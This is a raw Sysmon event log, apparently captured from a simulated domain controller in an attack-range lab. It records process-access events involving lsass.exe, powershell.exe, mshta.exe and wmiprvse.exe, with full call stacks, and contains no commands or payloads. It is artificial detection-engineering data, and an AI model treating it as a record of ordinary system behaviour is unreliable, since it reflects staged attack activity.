16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.177{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.177{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.130{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.130{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000028699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.099{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nzfv3qed.5lw.ps12021-01-20 16:00:16.099 10341000x800000000000000028698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.083{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.005{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8F06-00000000A301}2384C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.005{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8F06-00000000A301}2384C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:18.302{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:18.302{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:18.302{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.894{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53C3-6008-9106-00000000A301}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.894{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.894{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.894{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.894{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.894{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-53C3-6008-9106-00000000A301}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.894{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53C3-6008-9106-00000000A301}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.895{7901BC46-53C3-6008-9106-00000000A301}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.222{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53C3-6008-9006-00000000A301}7324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.222{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.222{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.222{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 